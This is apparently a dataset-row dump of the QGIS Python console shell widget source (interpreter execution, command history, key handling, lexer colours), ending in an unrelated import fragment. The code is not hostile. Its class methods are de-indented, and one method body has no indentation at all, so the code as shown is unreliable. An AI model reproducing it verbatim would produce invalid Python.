code
stringlengths 1
25.8M
| language
stringclasses 18
values | source
stringclasses 4
values | repo
stringclasses 78
values | path
stringlengths 0
268
|
|---|---|---|---|---|
# -*- coding:utf-8 -*-
"""
/***************************************************************************
Python Console for QGIS
-------------------
begin : 2012-09-10
copyright : (C) 2012 by Salvatore Larosa
email : lrssvtml (at) gmail (dot) com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
Some portions of code were taken from https://code.google.com/p/pydee/
"""
from qgis.PyQt.QtCore import Qt, QByteArray, QCoreApplication, QFile, QSize
from qgis.PyQt.QtWidgets import QDialog, QMenu, QShortcut, QApplication
from qgis.PyQt.QtGui import QColor, QKeySequence, QFont, QFontMetrics, QStandardItemModel, QStandardItem, QClipboard, QFontDatabase
from qgis.PyQt.Qsci import QsciScintilla, QsciLexerPython, QsciAPIs
import sys
import os
import code
import codecs
import re
import traceback
from qgis.core import QgsApplication, QgsSettings, Qgis
from .ui_console_history_dlg import Ui_HistoryDialogPythonConsole
# Commands executed once at shell start-up so that common QGIS / Qt / processing
# names are available in the console without explicit imports.
_init_commands = ["import sys", "import os", "import re", "import math", "from qgis.core import *", "from qgis.gui import *", "from qgis.analysis import *", "import processing", "import qgis.utils",
                  "from qgis.utils import iface", "from qgis.PyQt.QtCore import *", "from qgis.PyQt.QtGui import *", "from qgis.PyQt.QtWidgets import *",
                  "from qgis.PyQt.QtNetwork import *", "from qgis.PyQt.QtXml import *"]
# File in the user's QGIS settings directory where command history is persisted.
_historyFile = os.path.join(QgsApplication.qgisSettingsDirPath(), "console_history.txt")
class ShellScintilla(QsciScintilla, code.InteractiveInterpreter):
    """Interactive Python shell widget for the QGIS Python console.

    Combines a QScintilla editor (prompt handling, highlighting,
    autocompletion) with ``code.InteractiveInterpreter`` (actual execution
    of the entered source).
    """

    # Default colour scheme (hex RGB); each value is only a fallback used
    # when no corresponding entry exists in QgsSettings.
    DEFAULT_COLOR = "#4d4d4c"
    KEYWORD_COLOR = "#8959a8"
    CLASS_COLOR = "#4271ae"
    METHOD_COLOR = "#4271ae"
    DECORATION_COLOR = "#3e999f"
    NUMBER_COLOR = "#c82829"
    COMMENT_COLOR = "#8e908c"
    COMMENT_BLOCK_COLOR = "#8e908c"
    BACKGROUND_COLOR = "#ffffff"
    CURSOR_COLOR = "#636363"
    CARET_LINE_COLOR = "#efefef"
    SINGLE_QUOTE_COLOR = "#718c00"
    DOUBLE_QUOTE_COLOR = "#718c00"
    TRIPLE_SINGLE_QUOTE_COLOR = "#eab700"
    TRIPLE_DOUBLE_QUOTE_COLOR = "#eab700"
    MARGIN_BACKGROUND_COLOR = "#efefef"
    MARGIN_FOREGROUND_COLOR = "#636363"
    SELECTION_BACKGROUND_COLOR = "#d7d7d7"
    SELECTION_FOREGROUND_COLOR = "#303030"
    MATCHED_BRACE_BACKGROUND_COLOR = "#b7f907"
    MATCHED_BRACE_FOREGROUND_COLOR = "#303030"
def __init__(self, parent=None):
    """Build the shell widget and run the start-up imports.

    :param parent: owning console widget; also used for message-bar
        feedback (``parent.callWidgetMessageBar``).
    """
    super(ShellScintilla, self).__init__(parent)
    code.InteractiveInterpreter.__init__(self, locals=None)
    self.parent = parent
    # Bracket/quote pairs used by the auto-close feature in keyPressEvent().
    self.opening = ['(', '{', '[', "'", '"']
    self.closing = [')', '}', ']', "'", '"']
    self.settings = QgsSettings()
    # Enable non-ascii chars for editor
    self.setUtf8(True)
    self.new_input_line = True
    # No margins (line numbers etc.) in the shell input area.
    self.setMarginWidth(0, 0)
    self.setMarginWidth(1, 0)
    self.setMarginWidth(2, 0)
    # Lines of a multi-line command collected so far (see runCommand()).
    self.buffer = []
    self.displayPrompt(False)
    # Pre-import common QGIS/Qt names into the interpreter namespace.
    for line in _init_commands:
        self.runsource(line)
    self.history = []
    self.historyIndex = 0
    # Read history command file
    self.readHistoryFile()
    self.historyDlg = HistoryDialog(self)
    # Brace matching: enable for a brace immediately before or after
    # the current position
    self.setBraceMatching(QsciScintilla.SloppyBraceMatch)
    # Current line visible with special background color
    self.setCaretWidth(2)
    self.refreshSettingsShell()
    # Don't want to see the horizontal scrollbar at all
    # Use raw message to Scintilla here (all messages are documented
    # here: http://www.scintilla.org/ScintillaDoc.html)
    self.SendScintilla(QsciScintilla.SCI_SETHSCROLLBAR, 0)
    # not too small
    # self.setMinimumSize(500, 300)
    self.setWrapMode(QsciScintilla.WrapCharacter)
    self.SendScintilla(QsciScintilla.SCI_EMPTYUNDOBUFFER)
    # Disable command key
    ctrl, shift = self.SCMOD_CTRL << 16, self.SCMOD_SHIFT << 16
    self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('L') + ctrl)
    self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('T') + ctrl)
    self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('D') + ctrl)
    self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('Z') + ctrl)
    self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('Y') + ctrl)
    self.SendScintilla(QsciScintilla.SCI_CLEARCMDKEY, ord('L') + ctrl + shift)
    # New QShortcut = ctrl+space/ctrl+alt+space for Autocomplete
    self.newShortcutCSS = QShortcut(QKeySequence(Qt.CTRL + Qt.SHIFT + Qt.Key_Space), self)
    self.newShortcutCAS = QShortcut(QKeySequence(Qt.CTRL + Qt.ALT + Qt.Key_Space), self)
    self.newShortcutCSS.setContext(Qt.WidgetShortcut)
    self.newShortcutCAS.setContext(Qt.WidgetShortcut)
    self.newShortcutCAS.activated.connect(self.autoCompleteKeyBinding)
    self.newShortcutCSS.activated.connect(self.showHistory)
def _setMinimumHeight(self):
    """Base the widget's minimum height on the lexer's default font."""
    metrics = QFontMetrics(self.lexer.defaultFont(0))
    self.setMinimumHeight(metrics.height() + 10)
def refreshSettingsShell(self):
    """Re-apply user preferences: lexer, autocompletion source/threshold,
    caret/selection/brace colours, and minimum height."""
    # Set Python lexer
    self.setLexers()
    threshold = self.settings.value("pythonConsole/autoCompThreshold", 2, type=int)
    self.setAutoCompletionThreshold(threshold)
    radioButtonSource = self.settings.value("pythonConsole/autoCompleteSource", 'fromAPI')
    autoCompEnabled = self.settings.value("pythonConsole/autoCompleteEnabled", True, type=bool)
    if autoCompEnabled:
        if radioButtonSource == 'fromDoc':
            self.setAutoCompletionSource(self.AcsDocument)
        elif radioButtonSource == 'fromAPI':
            self.setAutoCompletionSource(self.AcsAPIs)
        elif radioButtonSource == 'fromDocAPI':
            self.setAutoCompletionSource(self.AcsAll)
    else:
        # Autocompletion disabled entirely.
        self.setAutoCompletionSource(self.AcsNone)
    cursorColor = self.settings.value("pythonConsole/cursorColor", QColor(self.CURSOR_COLOR))
    self.setCaretForegroundColor(cursorColor)
    self.setSelectionForegroundColor(QColor(self.settings.value("pythonConsole/selectionForegroundColor", QColor(self.SELECTION_FOREGROUND_COLOR))))
    self.setSelectionBackgroundColor(QColor(self.settings.value("pythonConsole/selectionBackgroundColor", QColor(self.SELECTION_BACKGROUND_COLOR))))
    self.setMatchedBraceBackgroundColor(QColor(self.settings.value("pythonConsole/matchedBraceBackgroundColor", QColor(self.MATCHED_BRACE_BACKGROUND_COLOR))))
    self.setMatchedBraceForegroundColor(QColor(self.settings.value("pythonConsole/matchedBraceForegroundColor", QColor(self.MATCHED_BRACE_FOREGROUND_COLOR))))
    # Sets minimum height for input area based of font metric
    self._setMinimumHeight()
def showHistory(self):
    """Show (and refresh) the command-history dialog."""
    dlg = self.historyDlg
    if not dlg.isVisible():
        dlg.show()
    dlg._reloadHistory()
    dlg.activateWindow()
def autoCompleteKeyBinding(self):
    """Trigger autocompletion from the source configured in settings."""
    if not self.settings.value("pythonConsole/autoCompleteEnabled", True, type=bool):
        return
    source = self.settings.value("pythonConsole/autoCompleteSource", 'fromAPI')
    if source == 'fromDoc':
        self.autoCompleteFromDocument()
    elif source == 'fromAPI':
        self.autoCompleteFromAPIs()
    elif source == 'fromDocAPI':
        self.autoCompleteFromAll()
def commandConsole(self, commands):
    """Clear the current input line, then append and execute each command.

    :param commands: iterable of command strings to run in order.
    """
    if not self.is_cursor_on_last_line():
        self.move_cursor_to_end()
    line, pos = self.getCursorPosition()
    selCmdLength = len(self.text(line))
    # Select everything after the 4-char prompt and discard it.
    self.setSelection(line, 4, line, selCmdLength)
    self.removeSelectedText()
    for cmd in commands:
        self.append(cmd)
        self.entered()
    self.move_cursor_to_end()
    self.setFocus()
def setLexers(self):
    """Create and configure the Python lexer: font, per-style colours,
    background, and the autocompletion API database."""
    self.lexer = QsciLexerPython()
    # Start from the platform fixed-width font; user settings may override.
    font = QFontDatabase.systemFont(QFontDatabase.FixedFont)
    loadFont = self.settings.value("pythonConsole/fontfamilytext")
    if loadFont:
        font.setFamily(loadFont)
    fontSize = self.settings.value("pythonConsole/fontsize", type=int)
    if fontSize:
        font.setPointSize(fontSize)
    self.lexer.setDefaultFont(font)
    self.lexer.setDefaultColor(QColor(self.settings.value("pythonConsole/defaultFontColor", QColor(self.DEFAULT_COLOR))))
    # The integers below are QsciLexerPython style ids (1=Comment, 2=Number,
    # 3=DoubleQuotedString, 4=SingleQuotedString, 5=Keyword, 6/7=triple-quoted
    # strings, 8=ClassName, 9=FunctionMethodName, 12=CommentBlock, 15=Decorator).
    self.lexer.setColor(QColor(self.settings.value("pythonConsole/commentFontColor", QColor(self.COMMENT_COLOR))), 1)
    self.lexer.setColor(QColor(self.settings.value("pythonConsole/numberFontColor", QColor(self.NUMBER_COLOR))), 2)
    self.lexer.setColor(QColor(self.settings.value("pythonConsole/keywordFontColor", QColor(self.KEYWORD_COLOR))), 5)
    self.lexer.setColor(QColor(self.settings.value("pythonConsole/classFontColor", QColor(self.CLASS_COLOR))), 8)
    self.lexer.setColor(QColor(self.settings.value("pythonConsole/methodFontColor", QColor(self.METHOD_COLOR))), 9)
    self.lexer.setColor(QColor(self.settings.value("pythonConsole/decorFontColor", QColor(self.DECORATION_COLOR))), 15)
    self.lexer.setColor(QColor(self.settings.value("pythonConsole/commentBlockFontColor", QColor(self.COMMENT_BLOCK_COLOR))), 12)
    self.lexer.setColor(QColor(self.settings.value("pythonConsole/singleQuoteFontColor", QColor(self.SINGLE_QUOTE_COLOR))), 4)
    self.lexer.setColor(QColor(self.settings.value("pythonConsole/doubleQuoteFontColor", QColor(self.DOUBLE_QUOTE_COLOR))), 3)
    self.lexer.setColor(QColor(self.settings.value("pythonConsole/tripleSingleQuoteFontColor", QColor(self.TRIPLE_SINGLE_QUOTE_COLOR))), 6)
    self.lexer.setColor(QColor(self.settings.value("pythonConsole/tripleDoubleQuoteFontColor", QColor(self.TRIPLE_DOUBLE_QUOTE_COLOR))), 7)
    self.lexer.setColor(QColor(self.settings.value("pythonConsole/defaultFontColorEditor", QColor(self.DEFAULT_COLOR))), 13)
    self.lexer.setFont(font, 1)
    self.lexer.setFont(font, 3)
    self.lexer.setFont(font, 4)
    self.lexer.setFont(font, QsciLexerPython.UnclosedString)
    # Same paper (background) colour for every lexer style.
    for style in range(0, 33):
        paperColor = QColor(self.settings.value("pythonConsole/paperBackgroundColor", QColor(self.BACKGROUND_COLOR)))
        self.lexer.setPaper(paperColor, style)
    self.api = QsciAPIs(self.lexer)
    checkBoxAPI = self.settings.value("pythonConsole/preloadAPI", True, type=bool)
    checkBoxPreparedAPI = self.settings.value("pythonConsole/usePreparedAPIFile", False, type=bool)
    if checkBoxAPI:
        # Ship-time prepared PyQGIS API database.
        pap = os.path.join(QgsApplication.pkgDataPath(), "python", "qsci_apis", "pyqgis.pap")
        self.api.loadPrepared(pap)
    elif checkBoxPreparedAPI:
        # User-supplied pre-compiled .pap file.
        self.api.loadPrepared(self.settings.value("pythonConsole/preparedAPIFile"))
    else:
        # Raw user .api files must be prepared before use.
        apiPath = self.settings.value("pythonConsole/userAPI", [])
        for i in range(0, len(apiPath)):
            self.api.load(apiPath[i])
        self.api.prepare()
        self.lexer.setAPIs(self.api)
    self.setLexer(self.lexer)
    # TODO: show completion list for file and directory
def getText(self):
    """Get the text as a unicode string."""
    # Scintilla stores text as utf-8 internally; decode the raw bytes.
    # (Printing the result may fail if the console font lacks some glyphs.)
    return self.getBytes().decode('utf-8')
def getBytes(self):
    """Get the text as bytes (utf-8 encoded). This is how
    the data is stored internally."""
    # +1 for the terminating NUL that SCI_GETTEXT writes into the buffer.
    # (Renamed local: the original shadowed the builtin `len`.)
    size = self.SendScintilla(self.SCI_GETLENGTH) + 1
    buf = QByteArray(size, '0')
    self.SendScintilla(self.SCI_GETTEXT, size, buf)
    # Strip the trailing NUL before returning.
    return bytes(buf)[:-1]
def getTextLength(self):
    """Return the document length in bytes, as reported by Scintilla."""
    return self.SendScintilla(QsciScintilla.SCI_GETLENGTH)
def get_end_pos(self):
    """Return (line, index) position of the last character."""
    last_line = self.lines() - 1
    return last_line, len(self.text(last_line))
def is_cursor_at_end(self):
    """Return True if cursor is at the end of text."""
    return self.getCursorPosition() == self.get_end_pos()
def move_cursor_to_end(self):
    """Move cursor to end of text and make it visible."""
    end_line, end_index = self.get_end_pos()
    self.setCursorPosition(end_line, end_index)
    self.ensureCursorVisible()
    self.ensureLineVisible(end_line)
def is_cursor_on_last_line(self):
    """Return True if cursor is on the last line."""
    current_line = self.getCursorPosition()[0]
    return current_line == self.lines() - 1
def is_cursor_on_edition_zone(self):
    """Return True if the cursor is editable: on the last line, past the
    4-character prompt."""
    cur_line, cur_index = self.getCursorPosition()
    return cur_line == self.lines() - 1 and cur_index >= 4
def new_prompt(self, prompt):
    """
    Print a new prompt and save its (line, index) position
    """
    # NOTE(review): this passes prompt=True, but write() as defined below
    # only accepts a single positional argument — confirm whether this
    # path is ever exercised.
    self.write(prompt, prompt=True)
    # now we update our cursor giving end of prompt
    line, index = self.getCursorPosition()
    self.ensureCursorVisible()
    self.ensureLineVisible(line)
def displayPrompt(self, more=False):
    """Append the primary ('>>> ') or continuation ('... ') prompt.

    :param more: True when the interpreter is waiting for more input
        (multi-line command), selecting the continuation prompt.
    """
    # Use a conditional expression as the argument instead of the original
    # conditional-expression-as-statement anti-idiom.
    self.append("... " if more else ">>> ")
    self.move_cursor_to_end()
def updateHistory(self, command):
    """Append a command (or list of commands) to the session history.

    Consecutive duplicates and empty strings are skipped; the history
    index is reset to one past the last entry.
    """
    if isinstance(command, list):
        # Bulk add (used when loading the history file) — no dedup.
        self.history.extend(command)
    elif command != "":
        # Skip only if identical to the most recent entry.
        if not self.history or command != self.history[-1]:
            self.history.append(command)
    self.historyIndex = len(self.history)
def writeHistoryFile(self, fromCloseConsole=False):
    """Persist the session history to the history file, one command per line.

    :param fromCloseConsole: True when called during console shutdown;
        suppresses the "saved" message bar.
    :raises OSError: propagated if the file cannot be written.
    """
    # 'with' guarantees the handle is closed even if a write fails;
    # the original leaked it on error and left `wH` unbound if open failed.
    with codecs.open(_historyFile, 'w', encoding='utf-8') as wH:
        for s in self.history:
            wH.write(s + '\n')
    if not fromCloseConsole:
        msgText = QCoreApplication.translate('PythonConsole',
                                             'History saved successfully.')
        self.parent.callWidgetMessageBar(msgText)
def readHistoryFile(self):
    """Load saved commands from the history file into the session history.

    Does nothing if the file does not exist; blank lines are skipped.
    """
    # Guard clause replaces the original trailing `else: return`;
    # drops the `l` local that shadowed nothing useful.
    if not QFile.exists(_historyFile):
        return
    with codecs.open(_historyFile, 'r', encoding='utf-8') as rH:
        for line in rH:
            if line != "\n":
                self.updateHistory(line.rstrip('\n'))
def clearHistory(self, clearSession=False):
    """Clear the history file, and optionally the in-memory session history.

    :param clearSession: when True, also empty ``self.history`` and show
        the combined message; the file itself is untouched in that branch
        (matching the original behavior).
    :raises OSError: propagated if the history file cannot be opened.
    """
    if clearSession:
        self.history = []
        msgText = QCoreApplication.translate('PythonConsole',
                                             'Session and file history cleared successfully.')
        self.parent.callWidgetMessageBar(msgText)
        return
    # Truncate the file by opening it for writing; 'with' closes it
    # reliably (the original's try/except-raise + close() was a no-op
    # error handler that leaked on failure).
    with codecs.open(_historyFile, 'w', encoding='utf-8'):
        pass
    msgText = QCoreApplication.translate('PythonConsole',
                                         'History cleared successfully.')
    self.parent.callWidgetMessageBar(msgText)
def clearHistorySession(self):
    """Clear only the in-memory (session) history."""
    self.clearHistory(clearSession=True)
def showPrevious(self):
    """Replace the input line with the next (more recent) history entry.

    Bound to Key_Down in keyPressEvent(). Moving past the newest entry
    yields an empty input line.

    NOTE(review): despite the name, this moves *forward* through history
    (historyIndex += 1); see the paired showNext() — the names look
    swapped relative to the usual prev/next convention.
    """
    if self.historyIndex < len(self.history) and self.history:
        line, pos = self.getCursorPosition()
        selCmdLength = len(self.text(line))
        # Select and remove everything after the 4-char prompt.
        self.setSelection(line, 4, line, selCmdLength)
        self.removeSelectedText()
        self.historyIndex += 1
        if self.historyIndex == len(self.history):
            # Walked past the newest entry: empty input line.
            self.insert("")
            pass
        else:
            self.insert(self.history[self.historyIndex])
        self.move_cursor_to_end()
        #self.SendScintilla(QsciScintilla.SCI_DELETEBACK)
def showNext(self):
    """Replace the input line with the previous (older) history entry.

    Bound to Key_Up in keyPressEvent().

    NOTE(review): despite the name, this moves *backward* through history
    (historyIndex -= 1); see showPrevious().
    """
    if self.historyIndex > 0 and self.history:
        line, pos = self.getCursorPosition()
        selCmdLength = len(self.text(line))
        # Select and remove everything after the 4-char prompt.
        self.setSelection(line, 4, line, selCmdLength)
        self.removeSelectedText()
        self.historyIndex -= 1
        if self.historyIndex == len(self.history):
            # Unreachable after the decrement (index < len); kept as-is.
            self.insert("")
        else:
            self.insert(self.history[self.historyIndex])
        self.move_cursor_to_end()
        #self.SendScintilla(QsciScintilla.SCI_DELETEBACK)
def keyPressEvent(self, e):
    """Keyboard handling for the shell.

    Keeps edits confined to the input line (last line, past the prompt),
    runs the command on Return/Enter, navigates history on Up/Down,
    auto-closes brackets/quotes, and auto-inserts ``import`` after
    ``from X``.
    """
    startLine, startPos, endLine, endPos = self.getSelection()
    # handle invalid cursor position and multiline selections
    if not self.is_cursor_on_edition_zone() or startLine < endLine:
        # allow copying and selecting
        if e.modifiers() & (Qt.ControlModifier | Qt.MetaModifier):
            if e.key() == Qt.Key_C:
                # only catch and return from Ctrl-C here if there's a selection
                if self.hasSelectedText():
                    QsciScintilla.keyPressEvent(self, e)
                    return
            elif e.key() == Qt.Key_A:
                QsciScintilla.keyPressEvent(self, e)
                return
            else:
                # swallow every other Ctrl/Meta shortcut outside the zone
                return
        # allow selection
        if e.modifiers() & Qt.ShiftModifier:
            if e.key() in (Qt.Key_Left, Qt.Key_Right, Qt.Key_Home, Qt.Key_End):
                QsciScintilla.keyPressEvent(self, e)
                return
        # all other keystrokes get sent to the input line
        self.move_cursor_to_end()
    if e.modifiers() & (Qt.ControlModifier | Qt.MetaModifier) and e.key() == Qt.Key_C and not self.hasSelectedText():
        # keyboard interrupt
        # (fire_keyboard_interrupt is an attribute of the console's custom
        # stdout object — presumably polled by the running code; confirm.)
        sys.stdout.fire_keyboard_interrupt = True
        return
    line, index = self.getCursorPosition()
    cmd = self.text(line)
    if e.key() in (Qt.Key_Return, Qt.Key_Enter) and not self.isListActive():
        self.entered()
    elif e.key() in (Qt.Key_Left, Qt.Key_Home):
        QsciScintilla.keyPressEvent(self, e)
        # check whether the cursor is moved out of the edition zone
        newline, newindex = self.getCursorPosition()
        if newline < line or newindex < 4:
            # fix selection and the cursor position
            if self.hasSelectedText():
                self.setSelection(line, self.getSelection()[3], line, 4)
            else:
                self.setCursorPosition(line, 4)
    elif e.key() in (Qt.Key_Backspace, Qt.Key_Delete):
        QsciScintilla.keyPressEvent(self, e)
        # check whether the cursor is moved out of the edition zone
        _, newindex = self.getCursorPosition()
        if newindex < 4:
            # restore the prompt chars (if removed) and
            # fix the cursor position
            self.insert(cmd[:3 - newindex] + " ")
            self.setCursorPosition(line, 4)
        self.recolor()
    elif (e.modifiers() & (Qt.ControlModifier | Qt.MetaModifier) and e.key() == Qt.Key_V) or \
            (e.modifiers() & Qt.ShiftModifier and e.key() == Qt.Key_Insert):
        self.paste()
        e.accept()
    elif e.key() == Qt.Key_Down and not self.isListActive():
        self.showPrevious()
    elif e.key() == Qt.Key_Up and not self.isListActive():
        self.showNext()
    # TODO: press event for auto-completion file directory
    else:
        t = e.text()
        self.autoCloseBracket = self.settings.value("pythonConsole/autoCloseBracket", False, type=bool)
        self.autoImport = self.settings.value("pythonConsole/autoInsertionImport", True, type=bool)
        # Input line text up to the cursor, prompts stripped.
        txt = cmd[:index].replace('>>> ', '').replace('... ', '')
        # Close bracket automatically
        if t in self.opening and self.autoCloseBracket:
            i = self.opening.index(t)
            if self.hasSelectedText() and startPos != 0:
                # wrap the current selection in the typed pair
                selText = self.selectedText()
                self.removeSelectedText()
                self.insert(self.opening[i] + selText + self.closing[i])
                self.setCursorPosition(endLine, endPos + 2)
                return
            elif t == '(' and (re.match(r'^[ \t]*def \w+$', txt) or
                               re.match(r'^[ \t]*class \w+$', txt)):
                # 'def foo(' / 'class Foo(' completes to '):'
                self.insert('):')
            else:
                self.insert(self.closing[i])
        # FIXES #8392 (automatically removes the redundant char
        # when autoclosing brackets option is enabled)
        elif t in [')', ']', '}'] and self.autoCloseBracket:
            txt = self.text(line)
            try:
                if txt[index - 1] in self.opening and t == txt[index]:
                    # skip over the already-present closer instead of doubling it
                    self.setCursorPosition(line, index + 1)
                    self.SendScintilla(QsciScintilla.SCI_DELETEBACK)
            except IndexError:
                pass
        elif t == ' ' and self.autoImport:
            # 'from package ' completes to 'from package import '
            ptrn = r'^[ \t]*from [\w.]+$'
            if re.match(ptrn, txt):
                self.insert(' import')
                self.setCursorPosition(line, index + 7)
        QsciScintilla.keyPressEvent(self, e)
def contextMenuEvent(self, e):
    """Build and show the shell context menu: history actions, copy, paste."""
    menu = QMenu(self)
    historyMenu = QMenu(menu)
    historyMenu.setTitle(
        QCoreApplication.translate("PythonConsole", "Command History"))
    historyMenu.addAction(
        QCoreApplication.translate("PythonConsole", "Show"),
        self.showHistory, 'Ctrl+Shift+SPACE')
    historyMenu.addAction(
        QCoreApplication.translate("PythonConsole", "Clear File"),
        self.clearHistory)
    historyMenu.addAction(
        QCoreApplication.translate("PythonConsole", "Clear Session"),
        self.clearHistorySession)
    menu.addMenu(historyMenu)
    menu.addSeparator()
    actionCopy = menu.addAction(
        QCoreApplication.translate("PythonConsole", "Copy"),
        self.copy, QKeySequence.Copy)
    actionPaste = menu.addAction(
        QCoreApplication.translate("PythonConsole", "Paste"),
        self.paste, QKeySequence.Paste)
    # Copy only with a selection; paste only with clipboard content.
    actionCopy.setEnabled(self.hasSelectedText())
    actionPaste.setEnabled(bool(QApplication.clipboard().text()))
    menu.exec_(self.mapToGlobal(e.pos()))
def mousePressEvent(self, e):
    """
    Re-implemented to handle the mouse press event.
    Middle-click pastes the primary selection onto the input line;
    everything else falls through to QsciScintilla.
    e: the mouse press event (QMouseEvent)
    """
    self.setFocus()
    if e.button() != Qt.MidButton:
        QsciScintilla.mousePressEvent(self, e)
        return
    primary_selection = QApplication.clipboard().text(QClipboard.Selection)
    if not self.is_cursor_on_last_line():
        self.move_cursor_to_end()
    self.insertFromDropPaste(primary_selection)
    e.accept()
def paste(self):
    """
    Paste clipboard text onto the input line.
    XXX: It should reimplement the virtual QScintilla.paste method,
    but it seems not used by QScintilla code.
    """
    clip_text = QApplication.clipboard().text()
    if not self.is_cursor_on_last_line():
        self.move_cursor_to_end()
    elif self.hasSelectedText():
        # Typing over a selection on the input line replaces it.
        self.removeSelectedText()
    self.insertFromDropPaste(clip_text)
# Drag and drop
def dropEvent(self, e):
if e.mimeData().hasText():
stringDrag = e.mimeData().text()
self.insertFromDropPaste(stringDrag)
self.setFocus()
e.setDropAction(Qt.CopyAction)
e.accept()
else:
QsciScintilla.dropEvent(self, e)
def insertFromDropPaste(self, textDP):
    """Insert multi-line pasted/dropped text.

    Every complete line is executed immediately (prompts stripped);
    a trailing partial line is left on the input line for editing.
    """
    pasteList = textDP.splitlines()
    if pasteList:
        for line in pasteList[:-1]:
            # Strip any copied console prompts before executing.
            cleanLine = line.replace(">>> ", "").replace("... ", "")
            self.insert(cleanLine)
            self.move_cursor_to_end()
            self.runCommand(self.currentCommand())
        if pasteList[-1] != "":
            # Last fragment has no newline: insert without executing.
            line = pasteList[-1]
            cleanLine = line.replace(">>> ", "").replace("... ", "")
            curpos = self.getCursorPosition()
            self.insert(cleanLine)
            self.setCursorPosition(curpos[0], curpos[1] + len(cleanLine))
def insertTextFromFile(self, listOpenFile):
    """Execute a script loaded as a list of lines.

    Each line except the last is appended and run; the last line is
    appended without execution. SCI_DELETEBACK removes the newline that
    append() adds before the command is run.
    """
    for line in listOpenFile[:-1]:
        self.append(line)
        self.move_cursor_to_end()
        self.SendScintilla(QsciScintilla.SCI_DELETEBACK)
        self.runCommand(self.currentCommand())
    self.append(listOpenFile[-1])
    self.move_cursor_to_end()
    self.SendScintilla(QsciScintilla.SCI_DELETEBACK)
def entered(self):
    """Execute the current input line (called on Return/Enter)."""
    self.move_cursor_to_end()
    self.runCommand(self.currentCommand())
    self.setFocus()
    self.move_cursor_to_end()
def currentCommand(self):
    """Return the text of the input line without the 4-character prompt.

    (Dropped the unused getCursorPosition() call and the redundant
    local-to-local copy from the original.)
    """
    return self.text()[4:]
def runCommand(self, cmd):
    """Run one console line: echo it, record history, handle the magic
    documentation commands, otherwise feed it to the interpreter."""
    self.writeCMD(cmd)
    import webbrowser
    self.updateHistory(cmd)
    # Documentation version matching the running QGIS ('master' or e.g. '3.4').
    version = 'master' if 'master' in Qgis.QGIS_VERSION.lower() else re.findall(r'^\d.[0-9]*', Qgis.QGIS_VERSION)[0]
    if cmd in ('_pyqgis', '_api', '_cookbook'):
        # Magic commands: open the relevant docs in the system browser.
        if cmd == '_pyqgis':
            webbrowser.open("https://qgis.org/pyqgis/{}".format(version))
        elif cmd == '_api':
            webbrowser.open("https://qgis.org/api/{}".format('' if version == 'master' else version))
        elif cmd == '_cookbook':
            webbrowser.open("https://docs.qgis.org/{}/en/docs/pyqgis_developer_cookbook/".format(
                'testing' if version == 'master' else version))
        more = False
    else:
        # Accumulate lines until the interpreter says the command is complete.
        self.buffer.append(cmd)
        src = "\n".join(self.buffer)
        # runsource() returns True when more input is required (multi-line).
        more = self.runsource(src)
    if not more:
        self.buffer = []
    # prevents to commands with more lines to break the console
    # in the case they have a eol different from '\n'
    self.setText('')
    self.move_cursor_to_end()
    self.displayPrompt(more)
def write(self, txt, prompt=False):
    """Write interpreter output (tracebacks etc.) to stderr.

    :param txt: text to write.
    :param prompt: accepted for compatibility with new_prompt(), which
        calls ``self.write(prompt, prompt=True)``; the original signature
        rejected that keyword with a TypeError. The flag is currently
        unused here.
    """
    sys.stderr.write(txt)
def writeCMD(self, txt):
    """Echo the entered command (with its prompt) to the console output."""
    if sys.stdout:
        # fire_keyboard_interrupt lives on the console's custom stdout
        # object; reset it before running a new command.
        sys.stdout.fire_keyboard_interrupt = False
    if len(txt) > 0:
        # First 4 chars of the widget text are the prompt ('>>> '/'... ').
        getCmdString = self.text()
        prompt = getCmdString[0:4]
        sys.stdout.write(prompt + txt + '\n')
def runsource(self, source, filename='<input>', symbol='single'):
    """Compile and run source in the interpreter, routing any uncaught
    exception's traceback into the console via self.write().

    Returns True if more input is required (incomplete command).
    """
    if sys.stdout:
        sys.stdout.fire_keyboard_interrupt = False
    # Temporarily install an excepthook that prints into this widget;
    # the finally block guarantees the previous hook is restored.
    hook = sys.excepthook
    try:
        def excepthook(etype, value, tb):
            self.write("".join(traceback.format_exception(etype, value, tb)))
        sys.excepthook = excepthook
        return super(ShellScintilla, self).runsource(source, filename, symbol)
    finally:
        sys.excepthook = hook
class HistoryDialog(QDialog, Ui_HistoryDialogPythonConsole):
    """Dialog listing the shell's command history.

    Double-clicking an entry re-runs it in the parent shell; the Delete
    key removes the selected entry from the session history.
    """

    def __init__(self, parent):
        # parent is the ShellScintilla instance that owns the history.
        QDialog.__init__(self, parent)
        self.setupUi(self)
        self.parent = parent
        self.setWindowTitle(QCoreApplication.translate("PythonConsole",
                                                       "Python Console - Command History"))
        self.listView.setToolTip(QCoreApplication.translate("PythonConsole",
                                                            "Double-click on item to execute"))
        self.model = QStandardItemModel(self.listView)
        self._reloadHistory()
        self.deleteScut = QShortcut(QKeySequence(Qt.Key_Delete), self)
        self.deleteScut.activated.connect(self._deleteItem)
        self.listView.doubleClicked.connect(self._runHistory)
        self.reloadHistory.clicked.connect(self._reloadHistory)
        self.saveHistory.clicked.connect(self._saveHistory)

    def _runHistory(self, item):
        """Run the double-clicked history entry in the parent shell."""
        cmd = item.data(Qt.DisplayRole)
        self.parent.runCommand(cmd)

    def _saveHistory(self):
        # True suppresses the shell's "saved" message bar.
        self.parent.writeHistoryFile(True)

    def _reloadHistory(self):
        """Rebuild the list model from the shell's in-memory history."""
        self.model.clear()
        for i in self.parent.history:
            item = QStandardItem(i)
            if sys.platform.startswith('win'):
                # Explicit row height renders better on Windows.
                item.setSizeHint(QSize(18, 18))
            self.model.appendRow(item)
        self.listView.setModel(self.model)
        self.listView.scrollToBottom()

    def _deleteItem(self):
        """Remove the selected entry from the session history and the view."""
        itemsSelected = self.listView.selectionModel().selectedIndexes()
        if itemsSelected:
            item = itemsSelected[0].row()
            # Remove item from the command history (just for the current session)
            self.parent.history.pop(item)
            self.parent.historyIndex -= 1
            # Remove row from the command history dialog
            self.model.removeRow(item)
|
unknown
|
codeparrot/codeparrot-clean
| ||
# coding: utf-8
from __future__ import unicode_literals
import re
import time
import itertools
